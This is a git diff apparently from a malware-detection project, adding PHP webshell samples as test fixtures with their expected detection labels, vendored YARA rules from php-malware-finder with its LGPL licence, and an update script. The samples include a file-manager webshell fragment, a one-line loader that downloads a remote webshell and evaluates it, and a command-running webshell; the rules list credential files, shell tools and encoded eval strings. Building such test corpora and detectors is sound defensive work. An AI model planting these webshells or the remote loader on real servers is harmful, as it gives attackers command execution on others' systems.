+
+| Name |
+Size |
+Permissions |
+Options |
+
';
+
+foreach($lokasinya as $dir){
+ if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue;
+ echo "
+ | ".$dir." |
+ -- |
+ ";
+ if(is_writable($lokasi."/".$dir)) echo '';
+ elseif(!is_readable($lokasi."/".$dir)) echo '';
+ echo statusnya($lokasi."/".$dir);
+ if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo '';
+
+ echo " |
+ |
+
";
+}
+
+echo ' | | | |
';
+foreach($lokasinya as $file) {
+ if(!is_file("$lokasi/$file")) continue;
+ $size = filesize("$lokasi/$file")/1024;
+ $size = round($size,3);
+ if($size >= 1024){
+ $size = round($size/1024,2).' MB';
+} else {
+ $size = $size.' KB';
+}
+
+echo "
+| $file |
+".$size." |
+";
+if(is_writable("$lokasi/$file")) echo '';
+elseif(!is_readable("$lokasi/$file")) echo '';
+echo statusnya("$lokasi/$file");
+if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo '';
+echo " |
+ |
+
";
+}
+
+echo '
';
+author();
+?>
diff --git a/samples/PHP/2024.sagsooz/2024.php.simple b/samples/PHP/2024.sagsooz/2024.php.simple
new file mode 100644
index 00000000..649568ef
--- /dev/null
+++ b/samples/PHP/2024.sagsooz/2024.php.simple
@@ -0,0 +1,22 @@
+# PHP/2024.sagsooz/2024.php
+3P/InQuest-VT/base64/url
+3P/php-malware/dangerousphp
+3P/php-malware/dodgyphp
+3P/php-malware/dodgystrings
+3P/signature_base/webshell/php
+combo/backdoor/php
+data/embedded/base64/url
+data/embedded/html
+encoding/base64
+evasion/base64/decode
+evasion/php_no_time_limit
+exec/shell_command
+fs/directory/remove
+fs/file/delete
+fs/permission/modify
+net/http/form/upload
+net/http/post
+net/upload
+net/url/encode
+ref/site/url
+ref/words/password
diff --git a/samples/PHP/2024.sagsooz/bestmini.php b/samples/PHP/2024.sagsooz/bestmini.php
new file mode 100644
index 00000000..ff754389
--- /dev/null
+++ b/samples/PHP/2024.sagsooz/bestmini.php
@@ -0,0 +1 @@
+".file_get_contents("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/2024.php"));?>
diff --git a/samples/PHP/2024.sagsooz/bestmini.php.simple b/samples/PHP/2024.sagsooz/bestmini.php.simple
new file mode 100644
index 00000000..e7c61ba1
--- /dev/null
+++ b/samples/PHP/2024.sagsooz/bestmini.php.simple
@@ -0,0 +1,6 @@
+# PHP/2024.sagsooz/bestmini.php
+3P/php-malware/obfuscatedphp
+3P/signature_base/webshell/php
+ref/site/php
+ref/site/url
+techniques/code_eval
diff --git a/samples/PHP/2024.tobiasGuta/webshell.php b/samples/PHP/2024.tobiasGuta/webshell.php
new file mode 100644
index 00000000..94d9889e
--- /dev/null
+++ b/samples/PHP/2024.tobiasGuta/webshell.php
@@ -0,0 +1,53 @@
+
+
+
+
+
+
Webshell
+
+
+
+
+ $ {$cmd}:\n\n$output\n";
+ echo $formatted_output;
+ }
+ ?>
+
+
+
+
+
+
+
diff --git a/third_party/yara/php-malware/LICENSE b/third_party/yara/php-malware/LICENSE
new file mode 100644
index 00000000..65c5ca88
--- /dev/null
+++ b/third_party/yara/php-malware/LICENSE
@@ -0,0 +1,165 @@
+ GNU LESSER GENERAL PUBLIC LICENSE
+ Version 3, 29 June 2007
+
+ Copyright (C) 2007 Free Software Foundation, Inc.
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+
+ This version of the GNU Lesser General Public License incorporates
+the terms and conditions of version 3 of the GNU General Public
+License, supplemented by the additional permissions listed below.
+
+ 0. Additional Definitions.
+
+ As used herein, "this License" refers to version 3 of the GNU Lesser
+General Public License, and the "GNU GPL" refers to version 3 of the GNU
+General Public License.
+
+ "The Library" refers to a covered work governed by this License,
+other than an Application or a Combined Work as defined below.
+
+ An "Application" is any work that makes use of an interface provided
+by the Library, but which is not otherwise based on the Library.
+Defining a subclass of a class defined by the Library is deemed a mode
+of using an interface provided by the Library.
+
+ A "Combined Work" is a work produced by combining or linking an
+Application with the Library. The particular version of the Library
+with which the Combined Work was made is also called the "Linked
+Version".
+
+ The "Minimal Corresponding Source" for a Combined Work means the
+Corresponding Source for the Combined Work, excluding any source code
+for portions of the Combined Work that, considered in isolation, are
+based on the Application, and not on the Linked Version.
+
+ The "Corresponding Application Code" for a Combined Work means the
+object code and/or source code for the Application, including any data
+and utility programs needed for reproducing the Combined Work from the
+Application, but excluding the System Libraries of the Combined Work.
+
+ 1. Exception to Section 3 of the GNU GPL.
+
+ You may convey a covered work under sections 3 and 4 of this License
+without being bound by section 3 of the GNU GPL.
+
+ 2. Conveying Modified Versions.
+
+ If you modify a copy of the Library, and, in your modifications, a
+facility refers to a function or data to be supplied by an Application
+that uses the facility (other than as an argument passed when the
+facility is invoked), then you may convey a copy of the modified
+version:
+
+ a) under this License, provided that you make a good faith effort to
+ ensure that, in the event an Application does not supply the
+ function or data, the facility still operates, and performs
+ whatever part of its purpose remains meaningful, or
+
+ b) under the GNU GPL, with none of the additional permissions of
+ this License applicable to that copy.
+
+ 3. Object Code Incorporating Material from Library Header Files.
+
+ The object code form of an Application may incorporate material from
+a header file that is part of the Library. You may convey such object
+code under terms of your choice, provided that, if the incorporated
+material is not limited to numerical parameters, data structure
+layouts and accessors, or small macros, inline functions and templates
+(ten or fewer lines in length), you do both of the following:
+
+ a) Give prominent notice with each copy of the object code that the
+ Library is used in it and that the Library and its use are
+ covered by this License.
+
+ b) Accompany the object code with a copy of the GNU GPL and this license
+ document.
+
+ 4. Combined Works.
+
+ You may convey a Combined Work under terms of your choice that,
+taken together, effectively do not restrict modification of the
+portions of the Library contained in the Combined Work and reverse
+engineering for debugging such modifications, if you also do each of
+the following:
+
+ a) Give prominent notice with each copy of the Combined Work that
+ the Library is used in it and that the Library and its use are
+ covered by this License.
+
+ b) Accompany the Combined Work with a copy of the GNU GPL and this license
+ document.
+
+ c) For a Combined Work that displays copyright notices during
+ execution, include the copyright notice for the Library among
+ these notices, as well as a reference directing the user to the
+ copies of the GNU GPL and this license document.
+
+ d) Do one of the following:
+
+ 0) Convey the Minimal Corresponding Source under the terms of this
+ License, and the Corresponding Application Code in a form
+ suitable for, and under terms that permit, the user to
+ recombine or relink the Application with a modified version of
+ the Linked Version to produce a modified Combined Work, in the
+ manner specified by section 6 of the GNU GPL for conveying
+ Corresponding Source.
+
+ 1) Use a suitable shared library mechanism for linking with the
+ Library. A suitable mechanism is one that (a) uses at run time
+ a copy of the Library already present on the user's computer
+ system, and (b) will operate properly with a modified version
+ of the Library that is interface-compatible with the Linked
+ Version.
+
+ e) Provide Installation Information, but only if you would otherwise
+ be required to provide such information under section 6 of the
+ GNU GPL, and only to the extent that such information is
+ necessary to install and execute a modified version of the
+ Combined Work produced by recombining or relinking the
+ Application with a modified version of the Linked Version. (If
+ you use option 4d0, the Installation Information must accompany
+ the Minimal Corresponding Source and Corresponding Application
+ Code. If you use option 4d1, you must provide the Installation
+ Information in the manner specified by section 6 of the GNU GPL
+ for conveying Corresponding Source.)
+
+ 5. Combined Libraries.
+
+ You may place library facilities that are a work based on the
+Library side by side in a single library together with other library
+facilities that are not Applications and are not covered by this
+License, and convey such a combined library under terms of your
+choice, if you do both of the following:
+
+ a) Accompany the combined library with a copy of the same work based
+ on the Library, uncombined with any other library facilities,
+ conveyed under the terms of this License.
+
+ b) Give prominent notice with the combined library that part of it
+ is a work based on the Library, and explaining where to find the
+ accompanying uncombined form of the same work.
+
+ 6. Revised Versions of the GNU Lesser General Public License.
+
+ The Free Software Foundation may publish revised and/or new versions
+of the GNU Lesser General Public License from time to time. Such new
+versions will be similar in spirit to the present version, but may
+differ in detail to address new problems or concerns.
+
+ Each version is given a distinguishing version number. If the
+Library as you received it specifies that a certain numbered version
+of the GNU Lesser General Public License "or any later version"
+applies to it, you have the option of following the terms and
+conditions either of that published version or of any later version
+published by the Free Software Foundation. If the Library as you
+received it does not specify a version number of the GNU Lesser
+General Public License, you may choose any version of the GNU Lesser
+General Public License ever published by the Free Software Foundation.
+
+ If the Library as you received it specifies that a proxy can decide
+whether future versions of the GNU Lesser General Public License shall
+apply, that proxy's public statement of acceptance of any version is
+permanent authorization for you to choose that version for the
+Library.
diff --git a/third_party/yara/php-malware/RELEASE b/third_party/yara/php-malware/RELEASE
new file mode 100644
index 00000000..20dce2f9
--- /dev/null
+++ b/third_party/yara/php-malware/RELEASE
@@ -0,0 +1 @@
+87b6d7faa4829b1e1c7c8895ef33d2b84d00b11f
diff --git a/third_party/yara/php-malware/php.yar b/third_party/yara/php-malware/php.yar
new file mode 100644
index 00000000..b9917db9
--- /dev/null
+++ b/third_party/yara/php-malware/php.yar
@@ -0,0 +1,382 @@
+/* bincapz HACK: whitelist non-PHP programs */
+private rule IsWhitelisted {
+ strings:
+ $php = " 250)) and not IsWhitelisted
+}
+
+rule HiddenInAFile
+{
+ strings:
+ $gif = {47 49 46 38 ?? 61} // GIF8[version]a
+ $png = {89 50 4E 47 0D 0a 1a 0a} // \X89png\X0D\X0A\X1A\X0A
+ $jpeg = {FF D8 FF E0 ?? ?? 4A 46 49 46 } // https://raw.githubusercontent.com/corkami/pics/master/JPG.png
+
+ condition:
+ ($gif at 0 or $png at 0 or $jpeg at 0) and (PasswordProtection or ObfuscatedPhp or DodgyPhp or DangerousPhp) and not IsWhitelisted
+}
+
+rule CloudFlareBypass
+{
+ strings:
+ $ = "chk_jschl"
+ $ = "jschl_vc"
+ $ = "jschl_answer"
+
+ condition:
+ 2 of them // Better be safe than sorry
+}
+
+private rule IRC
+{
+ strings:
+ $ = "USER" fullword nocase
+ $ = "PASS" fullword nocase
+ $ = "PRIVMSG" fullword nocase
+ $ = "MODE" fullword nocase
+ $ = "PING" fullword nocase
+ $ = "PONG" fullword nocase
+ $ = "JOIN" fullword nocase
+ $ = "PART" fullword nocase
+
+ condition:
+ 5 of them
+}
+
+private rule b64
+{
+ strings:
+ $user_agent = "SFRUUF9VU0VSX0FHRU5UCg"
+ $eval = "ZXZhbCg"
+ $system = "c3lzdGVt"
+ $preg_replace = "cHJlZ19yZXBsYWNl"
+ $exec = "ZXhlYyg"
+ $base64_decode = "YmFzZTY0X2RlY29kZ"
+ $perl_shebang = "IyEvdXNyL2Jpbi9wZXJsCg"
+ $cmd_exe = "Y21kLmV4ZQ"
+ $powershell = "cG93ZXJzaGVsbC5leGU"
+
+ condition:
+ any of them
+}
+
+private rule hex
+{
+ strings:
+ $globals = "\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53" nocase
+ $eval = "\\x65\\x76\\x61\\x6C\\x28" nocase
+ $exec = "\\x65\\x78\\x65\\x63" nocase
+ $system = "\\x73\\x79\\x73\\x74\\x65\\x6d" nocase
+ $preg_replace = "\\x70\\x72\\x65\\x67\\x5f\\x72\\x65\\x70\\x6c\\x61\\x63\\x65" nocase
+ $http_user_agent = "\\x48\\124\\x54\\120\\x5f\\125\\x53\\105\\x52\\137\\x41\\107\\x45\\116\\x54" nocase
+ $base64_decode = "\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61\\x74\\x65\\x28" nocase
+
+ condition:
+ any of them
+}
+
+private rule Hpack
+{
+ strings:
+ $globals = "474c4f42414c53" nocase
+ $eval = "6576616C28" nocase
+ $exec = "65786563" nocase
+ $system = "73797374656d" nocase
+ $preg_replace = "707265675f7265706c616365" nocase
+ $base64_decode = "61736536345f6465636f646528677a696e666c61746528" nocase
+
+ condition:
+ any of them
+}
+
+private rule strrev
+{
+ strings:
+ $globals = "slabolg" nocase fullword
+ $preg_replace = "ecalper_gerp" nocase fullword
+ $base64_decode = "edoced_46esab" nocase fullword
+ $gzinflate = "etalfnizg" nocase fullword
+
+ condition:
+ any of them
+}
+
+
+rule SuspiciousEncoding
+{
+ condition:
+ (b64 or hex or strrev or Hpack) and not IsWhitelisted
+}
+
+rule DodgyStrings
+{
+ strings:
+ $ = ".bash_history"
+ $ = /AddType\s+application\/x-httpd-(php|cgi)/ nocase
+ $ = /php_value\s*auto_prepend_file/ nocase
+ $ = /SecFilterEngine\s+Off/ nocase // disable modsec
+ $ = /Add(Handler|Type|OutputFilter)\s+[^\s]+\s+\.htaccess/ nocase
+ $ = ".mysql_history"
+ $ = ".ssh/authorized_keys"
+ $ = "/(.*)/e" // preg_replace code execution
+ $ = "/../../../"
+ $ = "/etc/passwd"
+ $ = "/etc/proftpd.conf"
+ $ = "/etc/resolv.conf"
+ $ = "/etc/shadow"
+ $ = "/etc/syslog.conf"
+ $ = "/proc/cpuinfo" fullword
+ $ = "/var/log/lastlog"
+ $ = "/windows/system32/"
+ $ = "LOAD DATA LOCAL INFILE" nocase
+ $ = "WScript.Shell"
+ $ = "WinExec"
+ $ = "b374k" fullword nocase
+ $ = "backdoor" fullword nocase
+ $ = /(c99|r57|fx29)shell/
+ $ = "cmd.exe" fullword nocase
+ $ = "powershell.exe" fullword nocase
+ $ = /defac(ed|er|ement|ing)/ fullword nocase
+ $ = "evilc0ders" fullword nocase
+ $ = "exploit" fullword nocase
+ $ = "find . -type f" fullword
+ $ = "hashcrack" nocase
+ $ = "id_rsa" fullword
+ $ = "ipconfig" fullword nocase
+ $ = "kernel32.dll" fullword nocase
+ $ = "kingdefacer" nocase
+ $ = "Wireghoul" nocase fullword
+ $ = "LD_PRELOAD" fullword
+ $ = "libpcprofile" // CVE-2010-3856 local root
+ $ = "locus7s" nocase
+ $ = "ls -la" fullword
+ $ = "meterpreter" fullword
+ $ = "nc -l" fullword
+ $ = "netstat -an" fullword
+ $ = "php://"
+ $ = "ps -aux" fullword
+ $ = "rootkit" fullword nocase
+ $ = "slowloris" fullword nocase
+ $ = "suhosin" fullword
+ $ = "sun-tzu" fullword nocase // Because quotes from the Art of War is mandatory for any cool webshell.
+ $ = /trojan (payload)?/
+ $ = "uname -a" fullword
+ $ = "visbot" nocase fullword
+ $ = "warez" fullword nocase
+ $ = "whoami" fullword
+ $ = /(r[e3]v[e3]rs[e3]|w[3e]b|cmd)\s*sh[e3]ll/ nocase
+ $ = /-perm -0[24]000/ // find setuid files
+ $ = /\/bin\/(ba)?sh/ fullword
+ $ = /hack(ing|er|ed)/ nocase
+ $ = /(safe_mode|open_basedir) bypass/ nocase
+ $ = /xp_(execresultset|regenumkeys|cmdshell|filelist)/
+
+ $vbs = /language\s*=\s*vbscript/ nocase
+ $asp = "scripting.filesystemobject" nocase
+
+ condition:
+ (IRC or 2 of them) and not IsWhitelisted
+}
+
+rule Websites
+{
+ strings:
+ $ = "1337day.com" nocase
+ $ = "antichat.ru" nocase
+ $ = "b374k" nocase
+ $ = "ccteam.ru" nocase
+ $ = "crackfor" nocase
+ $ = "darkc0de" nocase
+ $ = "egyspider.eu" nocase
+ $ = "exploit-db.com" nocase
+ $ = "fopo.com.ar" nocase /* Free Online Php Obfuscator */
+ $ = "hashchecker.com" nocase
+ $ = "hashkiller.com" nocase
+ $ = "md5crack.com" nocase
+ $ = "md5decrypter.com" nocase
+ $ = "milw0rm.com" nocase
+ $ = "milw00rm.com" nocase
+ $ = "packetstormsecurity" nocase
+ $ = "pentestmonkey.net" nocase
+ $ = "phpjiami.com" nocase
+ $ = "rapid7.com" nocase
+ $ = "securityfocus" nocase
+ $ = "shodan.io" nocase
+ $ = "github.com/b374k/b374k" nocase
+ $ = "mumaasp.com" nocase
+
+ condition:
+ (any of them) and not IsWhitelisted
+}
+
diff --git a/third_party/yara/update.sh b/third_party/yara/update.sh
index 19ccfd6b..5818707b 100755
--- a/third_party/yara/update.sh
+++ b/third_party/yara/update.sh
@@ -33,6 +33,8 @@ function update_dep() {
local tmpdir=$(mktemp -d)
local rel="unknown"
+ mkdir -p "${kind}" || true
+
case $kind in
YARAForge)
rel=$(latest_github_release YARAHQ/yara-forge)
@@ -46,6 +48,23 @@ function update_dep() {
popd || exit 1
find "${tmpdir}" \( -name "*.yar*" -o -name "*LICENSE*" \) -print -exec cp {} "${kind}" \;
;;
+ php-malware)
+ git clone https://github.com/jvoisin/php-malware-finder.git "${tmpdir}"
+ pushd "${tmpdir}" || exit 1
+ rel="$(git rev-parse HEAD)"
+ popd || exit 1
+ cp "${tmpdir}/LICENSE" "${kind}"
+ echo '/* bincapz HACK: whitelist non-PHP programs */
+private rule IsWhitelisted {
+ strings:
+ $php = " "${tmpdir}/whitelist.yar"
+
+ grep -hv 'include "whitelist.yar"' "${tmpdir}/whitelist.yar" "${tmpdir}/data/php.yar" > "${kind}/php.yar"
+ ;;
threat_hunting)
rel=$(latest_github_release mthcht/ThreatHunting-Keywords-yara-rules)
curl -L -o "${tmpdir}/keywords.zip" "https://github.com/mthcht/ThreatHunting-Keywords-yara-rules/archive/refs/tags/${rel}.zip"